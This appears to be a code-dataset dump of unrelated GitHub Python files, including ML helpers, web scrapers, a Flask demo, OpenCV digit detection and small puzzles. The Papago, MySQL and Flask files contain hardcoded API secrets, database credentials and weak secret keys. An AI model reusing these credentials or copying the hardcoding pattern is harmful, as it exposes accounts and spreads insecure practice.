regression\n *returns - Boolean value to determine whether scalers and models need to be returned.\n \n Output:\n pred - List of arrays of predictions from testing the model after it is trained\n target - List of arrays of targets that correspond to runs in the test set\n runs - List arrays of runs used in testing.\n evs - List of explained variance scores for each dataset.\n scalers - List of standard scalers used (Optional)\n models - List of models used (Optional)\n \"\"\"\n \n pred = []\n targets = []\n tr_pred = []\n runs = []\n acc = []\n \n if returns:\n scalers = []\n models = []\n \n for i in range(len(feat)):\n train_set, test_set, train_target, test_target, train_runs, test_runs = \\\n train_test_split_old(feat[i].to_numpy(), target, np.asarray(runs_used[i]),testsize,rseed)\n \n if scale:\n scaler = StandardScaler()\n train_set = scaler.fit_transform(train_set)\n test_set = scaler.transform(test_set)\n \n model_tmp = clone(model)\n \n model_tmp.fit(train_set, train_target, sample_weight=None)\n \n pred.append(model_tmp.predict(test_set))\n tr_pred.append(model_tmp.predict(train_set))\n \n if c_or_r == 'r':\n acc.append(explained_variance_score(test_target,pred[i]))\n else:\n acc.append(accuracy_score(test_target,pred[i]))\n \n runs.append(test_runs)\n targets.append(test_target)\n \n if returns:\n models.append(model_tmp)\n if scale:\n scalers.append(scaler)\n \n if returns:\n return pred, tr_pred, targets, runs, acc, scalers, models\n else:\n return pred, tr_pred, targets, runs, acc","repo_name":"chrismhl/tsunami","sub_path":"tsunami_regress.py","file_name":"tsunami_regress.py","file_ext":"py","file_size_in_byte":23069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15755791268","text":"# 네이버 Papago NMT API 예제\nimport os\nimport sys\nimport urllib.request\n\ndef translate_lang():\n client_id = \"HnR6v1IdNhYJaslni_5v\"\n client_secret = \"ZBdGUtNIEa\"\n #encText = urllib.parse.quote(\"번역할 문장을 입력하세요\")\n data = \"source=es&target=ko&text=quiero tomar una cerveza.\"\n url = \"https://openapi.naver.com/v1/papago/n2mt\"\n request = urllib.request.Request(url)\n request.add_header(\"X-Naver-Client-Id\",client_id)\n request.add_header(\"X-Naver-Client-Secret\",client_secret)\n response = urllib.request.urlopen(request, data=data.encode(\"utf-8\"))\n rescode = response.getcode()\n if(rescode==200):\n response_body = response.read()\n print(response_body.decode('utf-8'))\n else:\n print(\"Error Code:\" + rescode)\n return ","repo_name":"Nenemttin/TIL","sub_path":"0_startcamp/day4/dafd.py","file_name":"dafd.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34905678104","text":"import os\nimport re\nimport sys\n\nimport baostock as bs\nimport pandas as pd\nfrom tqdm import tqdm\n\nRE_CODE_NUM = re.compile(\"\\d+\")\n\nlg = bs.login()\n\n\ndef deal_time(time_string):\n time_string = time_string[:12]\n date = \"-\".join([time_string[:4], time_string[4:6], time_string[6:8]])\n hm = \":\".join([time_string[8:10], time_string[10:12]])\n findall_time = \"{} {}\".format(date, hm)\n return findall_time\n\n\ndef get_daily_data(code, start_date, end_date):\n rs = bs.query_history_k_data_plus(\n code,\n \"date,open,high,low,close,volume\",\n start_date=start_date,\n end_date=end_date,\n frequency=\"d\",\n adjustflag=\"2\",\n )\n df = parse_result(rs, set_date2index=True, to_float=True)\n return df\n\n\ndef parse_result(rs, set_date2index=False, set_time2index=False, to_float=False):\n data_list = []\n while (rs.error_code == \"0\") & rs.next():\n data_list.append(rs.get_row_data())\n df = pd.DataFrame(data_list, columns=rs.fields)\n if len(df) == 0:\n raise Exception(rs.error_msg)\n if set_date2index:\n df.index = df.pop(\"date\")\n if set_time2index:\n times = df.pop(\"time\")\n times = [deal_time(t) for t in times]\n df.index = times\n df.pop(\"date\")\n if to_float:\n df = df.astype(float).round(3)\n return df\n\n\ndef get_zhongzheng500(day=None, only_code=False):\n rs = bs.query_zz500_stocks()\n df = parse_result(rs)\n if only_code:\n return list(df[\"code\"])\n df[\"base_code\"] = df[\"code\"].apply(lambda x: RE_CODE_NUM.findall(x)[0])\n return df\n\n\ndef get_stock_pool():\n\n rs = bs.query_stock_basic()\n all_stocks = parse_result(rs)\n\n all_stocks[~all_stocks[\"outDate\"].apply(lambda x: bool(x.strip()))]\n all_stocks = all_stocks[all_stocks[\"type\"] == \"1\"]\n codes = set(all_stocks[\"code\"])\n return codes\n\n\ndef download_stock(code, save_folder, start_date=None, end_date=None):\n\n start_date = start_date or \"2020-01-01\"\n try:\n df = get_daily_data(code, start_date, end_date)\n except Exception:\n print(\"download {} {}-{} error\".format(code, start_date, end_date,))\n return 0\n file_name = os.path.join(save_folder, \"{}.csv\".format(code))\n df.to_csv(file_name)\n return df\n","repo_name":"jieguangzhou/DolphinScheduler-MLOps-Stock-Analysis","sub_path":"dmsa/data_api/china_daily_data.py","file_name":"china_daily_data.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"169473965","text":"import datetime\nimport time\nimport models\nfrom flask import Flask\nfrom form import LoginForm\nfrom flask import render_template\nfrom flask import request,redirect\nfrom flask import url_for,flash\nfrom flask import session\nfrom flask import make_response\n\napp = Flask(__name__)\n\n@app.route('/hello')\ndef hello():\n pass\n name = request.args.get('name','Flask')\n return 'Hello %s'%name\n@app.route('/login',methods=['GET','POST'])\ndef login():\n if request.method == 'GET':\n return render_template('login.html')\n elif request.method=='POST':\n user = request.values.get('user')\n pwd = request.values.get('pwd')\n return 'hello world'\n\n@app.route('/register',methods=['GET','POST'])\ndef register():\n if request.method == 'GET':\n return render_template('register.html')\n elif request.method=='POST':\n user = request.values.get('user')\n pwd = request.values.get('pwd')\n pwd2 = request.values.get('pwd2')\n if user:\n if pwd == pwd2:\n pass\n return redirect('/login')\n\n# app.secret_key = 'SET_ME_BEFORE_USER_SESSION'\napp.secret_key = 'secret string'\n@app.route('/flush')\ndef flush():\n flash('I am Flash')\n\n return redirect(url_for('login'))\n@app.route('/index')\ndef index():\n session['key_time'] = datetime.datetime.now().strftime('%Y-%m-%d')\n return session['key_time']\n@app.route('/read/')\ndef read(year):\n return 'Welcome to %s'%year\n # return session.get('key_time')\n@app.route('/rend')\ndef renders():\n return '',302,{'Location':\"hello\"}\n# with app.test_request_context():\n# print(url_for('hello'))\n# print(url_for('login'))\n@app.route('/set/')\ndef set_cook(name):\n response = make_response(url_for('hello'))\n response.set_cookie('name',name)\n return response\n@app.route('/ser')\ndef ser_session():\n if 'logged_in' in session:\n return 'Welcome'\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"zgd0228/flask_","sub_path":"zgd_person/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24935997306","text":"def take_position(a):\n arg_1, arg_2 = a.strip(\"()\").split(\", \")\n return [int(arg_1), int(arg_2)]\n \n # part_1, part_2 = a.split(\",\")\n # r = int(part_1[1:])\n # c = int(part_2[1:len(part_2) - 1])\n # return [r, c]\n\n\ndef find_mines(pos):\n check_positions = set((r + pos[0], c + pos[1]) for r in range(-1, 2) for c in range(-1, 2))\n valid_positions = check_positions.intersection(field_positions)\n return [field[pos[0]][pos[1]] for pos in valid_positions].count(\"*\")\n\n\nsize = int(input())\nbomb_count = int(input())\nfield = [[0] * size for row in range(size)]\nfield_positions = set([(x, y) for x in range(size) for y in range(size)])\n\nfor _ in range(bomb_count):\n position = take_position(input())\n field[position[0]][position[1]] = \"*\"\n\nfor row in range(size):\n for col in range(size):\n if field[row][col] != \"*\":\n field[row][col] = find_mines([row, col])\n\n[print(f\"{' '.join(str(x) for x in row)}\") for row in field]\n","repo_name":"Polishko/SoftUni","sub_path":"Python Advanced Exams/August 2020 Retake/mine_sweeper_generator.py","file_name":"mine_sweeper_generator.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70480509289","text":"__author__ = \"Gianluca Fiore\"\n__copyright__ = \"\"\n__credits__ = \"\"\n__license__ = \"GPL\"\n__version__ = \"\"\n__mantainer__ = \"\"\n__date__ = \"2021/01/04\"\n__email__ = \"\"\n__status__ = \"\"\n\nimport sys\nimport yaml\n\ndef main():\n # input file needs to be redirected to script, as: validate_yaml.py < file.yaml\n print(yaml.safe_load(sys.stdin))\n\nif __name__ == '__main__':\n status = main()\n sys.exit(status)\n\n","repo_name":"Donearm/scripts","sub_path":"validate_yaml.py","file_name":"validate_yaml.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"53"} +{"seq_id":"42824769045","text":"import cv2\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nfrom sklearn import neighbors,svm,metrics\n\nfrom sklearn.model_selection import train_test_split\nfrom mnist import MNIST\nfrom sklearn.externals import joblib\ndef findRoi(frame, thresValue, margin): \n rois = [] \n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) \n gray2 = cv2.dilate(gray,None,iterations=2) \n gray2 = cv2.erode(gray2,None,iterations=2) \n edges = cv2.absdiff(gray,gray2) \n x = cv2.Sobel(edges,cv2.CV_16S,1,0) \n y = cv2.Sobel(edges,cv2.CV_16S,0,1) \n absX = cv2.convertScaleAbs(x) \n absY = cv2.convertScaleAbs(y) \n dst = cv2.addWeighted(absX,0.5,absY,0.5,0) \n ret, ddst = cv2.threshold(dst,thresValue,255,cv2.THRESH_BINARY) \n im, contours, hierarchy = cv2.findContours(ddst,cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) \n for c in contours: \n x, y, w, h = cv2.boundingRect(c)\n if w > 15 and h > 20:\n if x-margin>=0:\n x=x-margin\n w+=margin\n else:\n x=0\n w+=x\n if y-margin>=0:\n y=y-margin\n h+=margin\n else:\n y=0\n h+=y\n if x+w+margin0:\n output = concatenate(digits,10) \n cv2.imshow('digits', output)\n if single_flag:\n cv2.waitKey(0)\n return digits,edges,output\n\ndef getDataAndLabelFromPic(img,size_x=20,size_y=20):\n tmp=img.copy()\n digits,edges,conc=detectPicture(img,size_x=size_x,size_y=size_y)\n Nd = len(digits)\n cnt=0\n label=[]\n while cnt None:\n chrome_service = webdriver.chrome.service.Service(executable_path=ChromeDriverManager().install())\n self.driver = webdriver.Chrome(service=chrome_service)\n self.main_url = main_url\n self.driver.get(self.main_url)\n self.start()\n \n def start(self):\n try:\n df = pd.read_csv(os.path.join(\"data\",\"filtered_cars.csv\")) \n df[\"ImportPrice\"] = None\n # columns = df.columns\n tabs = WebDriverWait(self.driver, 10).until(EC.presence_of_all_elements_located((By.CLASS_NAME, \"rtsLink\")))\n tabs[1].click()\n price_input_id = \"ctl00_cphContent_csOS_VehiclesCVCView_rntbValue\"\n shipping_input_id = \"ctl00_cphContent_csOS_VehiclesCVCView_rntbOtherExpenses\"\n volume_input_id = \"ctl00_cphContent_csOS_VehiclesCVCView_rntbVolume\"\n engine_input_id = \"ctl00_cphContent_csOS_VehiclesCVCView_rcmbEngineType_Input\"\n year_input_id = \"ctl00_cphContent_csOS_VehiclesCVCView_rcmbYearOfProduction\"\n month_input_id = \"ctl00_cphContent_csOS_VehiclesCVCView_rcmbMonthOfProduction_Input\"\n day_input_id = \"ctl00_cphContent_csOS_VehiclesCVCView_rcmbDayOfProduction\"\n month_xpath = \"//div[@id='ctl00_cphContent_csOS_VehiclesCVCView_rcmbMonthOfProduction_DropDown']//ul[@class='rcbList']/li[7]\"\n engine_xpath = \"//div[@id='ctl00_cphContent_csOS_VehiclesCVCView_rcmbEngineType_DropDown']//ul[@class='rcbList']/li[1]\" \n price_input = WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.ID, price_input_id)))\n shipping_input = WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.ID, shipping_input_id)))\n volume_input = WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.ID, volume_input_id)))\n day_input = WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.ID, day_input_id)))\n price_id = \"cphContent_csOS_VehiclesCVCView_lblCustomsTotalDuty\"\n shipping_input.clear()\n shipping_input.send_keys(3000)\n time.sleep(2)\n WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable((By.ID, month_input_id))).click()\n time.sleep(2)\n WebDriverWait(self.driver,10).until(EC.element_to_be_clickable((By.XPATH, month_xpath))).click()\n time.sleep(2)\n day_input.clear()\n day_input.send_keys(10)\n WebDriverWait(self.driver,10).until(EC.element_to_be_clickable((By.ID, engine_input_id))).click()\n time.sleep(2)\n WebDriverWait(self.driver,10).until(EC.element_to_be_clickable((By.XPATH, engine_xpath))).click()\n \n for index, row in df.iterrows():\n year = row[\"Year\"]\n price = (int(row[\"Price\"]) * 0.9) * 1.15\n engine = int(float(row[\"Engine\"]) * 1000)\n price_input.clear()\n price_input.send_keys(price)\n WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable((By.ID, year_input_id))).click()\n time.sleep(2)\n WebDriverWait(self.driver,10).until(EC.element_to_be_clickable((By.XPATH, f\"//ul/li[contains(text(), '{year}')]\"))).click()\n time.sleep(2)\n volume_input.clear()\n volume_input.send_keys(engine)\n volume_input.send_keys(Keys.ENTER)\n tax_price = WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.ID, price_id))).get_attribute(\"textContent\")\n tax_price = int(int(tax_price.replace(\",\",\"\"))/390)\n df.loc[index, 'ImportPrice'] = tax_price\n time.sleep(10)\n df.loc[[index], ].to_csv(\"filtered_with_import.csv\",header = not os.path.exists(\"filtered_with_import.csv\"), index = False, mode = \"a\")\n except Exception as e:\n print(str(e))\n df.to_csv(\"filtered_cars_with_import.csv\")\n\n\n\nTaxCalculator()","repo_name":"sahNarek/data_vis_project","sub_path":"tax_scrapper.py","file_name":"tax_scrapper.py","file_ext":"py","file_size_in_byte":5141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35993239615","text":"\"\"\"\nFor your birthday, you have been given a grid of R (1 < R < 30) rows of lights, with each row containing L (1 ≤ L < 8) lights. \nLights can be in one of two states: on or off. For this question, the topmost row is row R, and the bottom-most row is row 1. \nAlso, beside all rows except the topmost row (row R), there is a button which can be pushed.\nPushing the button beside row k (1 ≤ k < R) will peform an \"exclusive-or\" operation on each light of row k, which is described \nbelow. Consider column i in row k, where 1 ≤ i ≤ L. If the lights in column i of row k and column i of row k + 1 are both the \nsame (i.e., both on, or both off), then pushing the button beside row k will cause the light in column i of row k to be off. \nIf the lights in column i of row k and column i of row k + 1 are different (i.e., one is on, and the other is off), then pushing \nthe button beside row k will cause the light in column i of row k to be on. An example is shown below, for L = 4:\nColumn Numbers\t1\t2\t3\t4\nRow k+1\ton\ton\toff\toff\nRow k before button pushed\ton\toff\ton\toff\nRow k after button pushed\toff\ton\ton\toff\nYou are told which lights are initially on and which are initially off. You must calculate how many different light patterns are possible for the bottom row by any sequence of button pushes. Each button may only be pressed once, but in any order.\n\"\"\"\nR = int(input())\nL = int(input())\nlights = []\nfor i in range(R):\n temp = input().split()\n temp2 = []\n for j in temp:\n temp2.append(int(j))\n lights.append(temp2)\nprev = [lights[0]]\nfor i in range(1,R):\n newprev = [lights[i]]\n cur = lights[i]\n for j in prev:\n newLights = []\n for k in range(L):\n newLights.append((cur[k]+j[k])%2)\n if newLights not in newprev:\n newprev.append(newLights)\n prev = newprev[::]\nprint(len(prev))\n","repo_name":"DChang87/Competitive-Programming-Solutions","sub_path":"ccc09s2.py","file_name":"ccc09s2.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40801507057","text":"import json\r\nimport mysql.connector\r\n\r\nfrom difflib import get_close_matches\r\nfrom mysql import connector\r\n\r\ndata = json.load(open(\"data.json\"))\r\n\r\ncon = mysql.connector.connect(\r\nuser = \"ardit700_student\",\r\npassword = \"ardit700_student\",\r\nhost = \"108.167.140.122\",\r\ndatabase = \"ardit700_pm1database\"\r\n)\r\n\r\nword = 'deres'\r\ncursor = con.cursor()\r\n#query = cursor.execute(\"SELECT * FROM Dictionary WHERE Expression = 'inlay'\")\r\nquery = cursor.execute(\"SELECT * FROM Dictionary WHERE Expression = '%s' \" % word)\r\n\r\n\r\nresults = cursor.fetchall()\r\n\r\n\r\nif results:\r\n for result in results:\r\n print(result)\r\nelse:\r\n print(\"no word \")\r\n","repo_name":"Gyepike/Gyakorlas","sub_path":"MegaCourse_Dic1/JASOn_Course.py","file_name":"JASOn_Course.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21924410538","text":"import os\nimport re\n\nfrom setuptools import find_packages, setup\n\n\ndef clean_html(raw_html):\n cleanr = re.compile(\"<.*?>\")\n cleantext = re.sub(cleanr, \"\", raw_html).strip()\n return cleantext\n\n\ndef _get_version():\n # get version string from version.py\n version_file = os.path.join(os.path.dirname(__file__), \"version.py\")\n version_regex = r\"__version__ = ['\\\"]([^'\\\"]*)['\\\"]\"\n with open(version_file, \"r\") as f:\n version = re.search(version_regex, f.read(), re.M).group(1)\n return version\n\n\ndef fetch_long_description():\n with open(\"README.md\", encoding=\"utf8\") as f:\n readme = f.read()\n # https://stackoverflow.com/a/12982689\n readme = clean_html(readme)\n return readme\n\n\ndef read_requirements(file):\n with open(file) as f:\n reqs = f.read()\n\n return reqs.strip().split(\"\\n\")\n\n\nDISTNAME = \"torchmultimodal\"\nDESCRIPTION = \"Multimodal modeling in PyTorch\"\nLONG_DESCRIPTION = fetch_long_description()\nLONG_DESCRIPTION_CONTENT_TYPE = \"text/markdown\"\nAUTHOR = \"PyTorch Multimodal\"\nAUTHOR_EMAIL = \"kartikayk@fb.com\"\n# Need to exclude folders in test as well so as they don't create an extra package\nEXCLUDES = (\"examples*\", \"test*\")\n\n\nif __name__ == \"__main__\":\n\n setup(\n name=DISTNAME,\n include_package_data=True,\n packages=find_packages(exclude=EXCLUDES),\n python_requires=\">=3.7\",\n install_requires=read_requirements(\"requirements.txt\"),\n version=_get_version(),\n description=DESCRIPTION,\n long_description=LONG_DESCRIPTION,\n long_description_content_type=LONG_DESCRIPTION_CONTENT_TYPE,\n url=\"https://github.com/facebookresearch/multimodal\",\n author=AUTHOR,\n author_email=AUTHOR_EMAIL,\n classifiers=[\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"License :: OSI Approved :: BSD License\",\n \"Topic :: Scientific/Engineering :: Artificial Intelligence\",\n ],\n extras_require={\"dev\": read_requirements(\"dev-requirements.txt\")},\n )\n","repo_name":"israfelsr/context-flava","sub_path":"multimodal/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"7601502808","text":"import datetime\nfrom psychopy import gui\n\n\ndef experiment_info(observer):\n \"\"\"\n okienko dialogowe na podczas uruchomienia procedury\n :param observer: observer_id\n :return: part_id, observer_id, date\n \"\"\"\n now = datetime.datetime.now()\n date = now.strftime(\"%Y-%m-%d %H:%M\")\n\n my_dlg = gui.Dlg(title=\"Go No-Go\")\n my_dlg.addText('Subject info')\n my_dlg.addField('ID:')\n my_dlg.addField('Age:')\n my_dlg.addField('Sex:', choices=['MALE', \"FEMALE\"])\n my_dlg.addText('Observer info')\n my_dlg.addField('Observer:', observer)\n\n my_dlg.show()\n if not my_dlg.OK:\n exit(1)\n\n # id sex age observer\n return my_dlg.data[0], my_dlg.data[2], my_dlg.data[1], my_dlg.data[3], date\n","repo_name":"ociepkam/Go_No-Go","sub_path":"classes/experiment_info.py","file_name":"experiment_info.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22736448912","text":"# p/xi output momentum grid object\n\n\nimport numpy as np\nimport scipy.constants\nfrom .MomentumGrid import MomentumGrid\n\n\nclass PXiGrid(MomentumGrid):\n \n\n def __init__(self, name, rgrid, data):\n \"\"\"\n Constructor.\n\n name: Grid name.\n rgrid: Parent 'Grid' object (representing radial grid).\n data: Momentum grid data.\n \"\"\"\n super(PXiGrid, self).__init__(name=name, rgrid=rgrid, data=data)\n\n self.p1name = 'p'\n self.p2name = 'xi'\n\n self.p = data['p1']\n self.xi = data['p2']\n self.xi_f = data['p2_f']\n self.dp = data['dp1']\n self.dxi = data['dp2']\n\n self.P, self.XI = np.meshgrid(self.p[:], self.xi[:])\n self.PPAR = self.P*self.XI\n self.PPERP = self.P*np.sqrt(1-self.XI**2)\n self.GAMMA = np.sqrt(self.P**2 + 1)\n\n\n def getGamma(self):\n \"\"\"\n Returns a meshgrid representing the relativistic factor on this\n 2D momentum grid.\n \"\"\"\n return self.GAMMA\n\n\n def getVpar(self):\n \"\"\"\n Returns a meshgrid representing the parallel velocity on this\n 2D momentum grid.\n \"\"\"\n return scipy.constants.c * (self.PPAR/self.GAMMA)\n\n def getBounceAveragedVpar(self):\n \"\"\"\n Returns a meshgrid representing the integrand that should weigh\n a function when carrying out the v_par moment of a quantity.\n \n It should be identical to the ``integrand`` produced by the \n ``CurrentDensityFromDistributionFunction`` class in the DREAM kernel. \n \"\"\"\n c = scipy.constants.speed_of_light\n integrand = np.zeros(self.Vprime.shape)\n\n # Load in data from file to speed up calculation\n Vprime_VpVol = self.Vprime_VpVol[:]\n p = self.p[:]\n xi = self.xi[:]\n xi_f = self.xi_f[:]\n xi0TrappedBoundary = self.rgrid.xi0TrappedBoundary[:]\n\n # Calculate bounce averaged v||\n for ir in range(0, self.rgrid.r.size):\n xi0Trapped = xi0TrappedBoundary[ir]\n for j in range(0, xi.size):\n xi1 = xi_f[j]\n xi2 = xi_f[j+1]\n if(xi1>xi2):\n xi_t = xi1\n xi1 = xi2\n xi2 = xi_t\n \n xi0Average = 0\n if (xi2<=-xi0Trapped) or (xi1>=xi0Trapped) or ((xi1<=-xi0Trapped) and (xi2>=xi0Trapped)): \n xi0Average = xi[j]\n\n if xi0Average != 0:\n for i in range(0, p.size):\n v = c * p[i] / np.sqrt(1+p[i]**2)\n integrand[ir,j,i] = 2*np.pi * p[i]**2 * v * xi0Average / Vprime_VpVol[ir,j,i]\n\n return integrand\n\n\n\n\n\n","repo_name":"chalmersplasmatheory/DREAM","sub_path":"py/DREAM/Output/PXiGrid.py","file_name":"PXiGrid.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"11766370675","text":"row = int(input(\"Enter row: \"))\r\ncol = int(input(\"Enter column: \"))\r\nmatrix=[]\r\nfor i in range(1, row+1):\r\n a= []\r\n for j in range(col):\r\n k = row * j+i\r\n a.append(k)\r\n matrix.append(a)\r\n\r\nfor i in range(row):\r\n for j in range(col):\r\n print(matrix[i][j], end=\" \")\r\n print()","repo_name":"aswnvm/matrix","sub_path":"matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2520948332","text":"import falcon\nimport datetime\nfrom db import Signin, Session, User\nfrom users import get_user\n\nclass Collection(object):\n def on_get(self, req, resp):\n user = get_user(req, resp)\n\n if user.is_admin():\n signins = Session.query(Signin).all()\n else:\n signins = Session.query(Signin).filter_by(user=user).all()\n\n signins_json = []\n for signin in signins:\n date = signin.date_in.strftime(\"%Y-%m-%d\")\n signins_json.append({'id': signin.id, 'date': date})\n\n req.context['result'] = {\n 'action': 'get signins',\n 'result': 'success',\n 'signins': signins_json\n }\n\n resp.status = falcon.HTTP_200\n\n def on_post(self, req, resp):\n doc = req.context['doc']\n lat = doc['lat']\n lon = doc['lon']\n date_in = datetime.datetime.utcnow()\n if lat and lon:\n user = get_user(req, resp)\n\n if lon >= -79.8921061:\n if lon <= -79.8833942:\n if lat <= 36.0984408:\n if lat >= 36.0903956:\n signin = Signin(date_in=date_in, user=user)\n user.signedin = True\n Session.add(signin)\n Session.commit()\n\n resp.status = falcon.HTTP_201\n resp.location = '/signins/%s' % (signin.id)\n req.context['result'] = {\"action\": \"sign in\", \"result\": \"success\"}\n else:\n resp.status = falcon.HTTP_409\n req.context['result'] = {\"action\": \"sign in\", \"result\": \"failure\"}\n\n else:\n resp.status = falcon.HTTP_409\n req.context['result'] = {\"action\": \"sign in\", \"result\": \"failure\"}\n\nclass Item(object):\n def on_get(self, req, resp, item_id):\n user = Session.query(User).get(req.context['user'])\n signin = Session.query(Signin).get(item_id)\n if signin.user == user or user.is_admin():\n date_in = signin.date_in.strftime(\"%Y-%m-%d\")\n req.context['result'] = {\n 'action': 'get signin',\n 'result': 'success',\n 'signin': {\n \"id\": signin.id,\n \"date\": date_in\n }\n }\n resp.status = falcon.HTTP_200\n else:\n req.context['result'] = {\n 'action': 'get signin',\n 'result': 'failure',\n 'error': 'wrong user'\n }\n resp.status = falcon.HTTP_401\n","repo_name":"ECGHelloWorld/PhoenixNowBackend","sub_path":"signins.py","file_name":"signins.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69919330088","text":"from google.appengine.ext import ndb\nfrom google.appengine.ext.ndb import msgprop\nfrom protorpc import messages\n\n\nclass Status(messages.Enum):\n \"\"\"Query status.\"\"\"\n Pending = 0\n Working = 1\n Done = 2\n Cancelled = 3\n\n\nclass Method(ndb.Model):\n \"\"\"Experiment method.\"\"\"\n qid = ndb.IntegerProperty()\n version = ndb.IntegerProperty()\n query = ndb.StringProperty()\n status_ids = ndb.IntegerProperty(repeated=True)\n\n\nclass Query(ndb.Model):\n \"\"\"Query details.\"\"\"\n query = ndb.StringProperty()\n uid = ndb.IntegerProperty()\n email = ndb.StringProperty(indexed=False)\n created = ndb.DateTimeProperty(auto_now_add=True, indexed=False)\n updated = ndb.DateTimeProperty(auto_now=True)\n status = msgprop.EnumProperty(Status, default=Status.Pending)\n status_msg = ndb.StringProperty(indexed=False)\n hashtags = ndb.StringProperty(repeated=True, indexed=False)\n keywords = ndb.StringProperty(repeated=True, indexed=False)\n methods = ndb.KeyProperty(kind=Method, repeated=True)\n\n\nclass Stopword(ndb.Model):\n token = ndb.StringProperty()\n\n\nclass Feedback(ndb.Model):\n \"\"\"Feedback for a particular query.\n 1: interesting, 0: neutral -1: not interesting.\n \"\"\"\n qid = ndb.IntegerProperty()\n uid = ndb.IntegerProperty()\n sid = ndb.IntegerProperty()\n score = ndb.IntegerProperty(indexed=False, choices=[-1, 0, 1])\n","repo_name":"Bekt/tweetement","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"17869542203","text":"#!/usr/bin/python3\r\nimport tkinter as tk\r\nimport tkinter.messagebox as mb\r\ntop = tk.Tk()\r\ntop.geometry(\"800x500\")\r\ntop.title(\"test app\")\r\ndef camerafunction():\r\n import numpy as np\r\n import cv2 as cv\r\n cap = cv.VideoCapture(0)\r\n # if not cap.isOpened():\r\n # print(\"Cannot open camera\")\r\n # exit()\r\n while True:\r\n # Capture frame-by-frame\r\n ret, frame = cap.read()\r\n frame = cv.flip(frame, 1)\r\n # if frame is read correctly ret is True\r\n if not ret:\r\n print(\"Can't receive frame (stream end?). Exiting ...\")\r\n break\r\n # Our operations on the frame come here\r\n gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\r\n # Display the resulting frame\r\n cv.imshow('frame', gray)\r\n if cv.waitKey(1) == ord('q'):\r\n break\r\n # When everything done, release the capture\r\n cap.release()\r\n cv.destroyAllWindows()\r\n\r\nB = tk.Button(top, text =\"Hello\", command = camerafunction)\r\nB.pack()\r\ntop.mainloop()","repo_name":"Sapitorico/Real_time_object_detection","sub_path":"test_files/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17579950249","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport requests\nimport csv\nfrom bs4 import BeautifulSoup\n\n\n# In[147]:\n\n\nmname,mrating,myear=list(),list(),list()\n\n\n# In[72]:\n\n\nresponse=requests.get(\"http://www.imdb.com/chart/top\")\n\n\n# In[74]:\n\n\nsoup=BeautifulSoup(response.text,'lxml')\n\n\n# In[112]:\n\n\nname=soup.select('td.titleColumn')\nrating=soup.find_all('strong')\nyear=soup.find_all(class_=\"secondaryInfo\")\n\n\n# In[148]:\n\n\nfor a,b,c in zip(name,rating,year):\n mname.append(a.get_text()[16:])\n mrating.append(b.get('title')[0:3])\n myear.append(c.get_text()[1:5])\n\n\n# In[150]:\n\n\nwith open(\"imdb_top250_movies.csv\",\"w\",encoding='utf-8',newline=\"\") as f:\n writer=csv.writer(f)\n writer.writerow([\"Name\",\"Rating\",\"Year\"])\n for a,b,c in zip(mname,mrating,myear):\n writer.writerow([a,b,c])\n\n","repo_name":"aryengoyal/Web-Scrapping","sub_path":"Top_250Movies.py","file_name":"Top_250Movies.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1363306731","text":"import math \n\n# class DecimalToRomanNumeral():\n# order = [1000,500,100,50,10,5,1]\n# # in words\n# def __init__(self,number):\n# self.number = number\n# self.roman = \"\"\n# # in symbols\n# def convert(self):\n# while(self.number>=1000):\n# self.roman+=\"M\"\n# self.number-=1000\n# 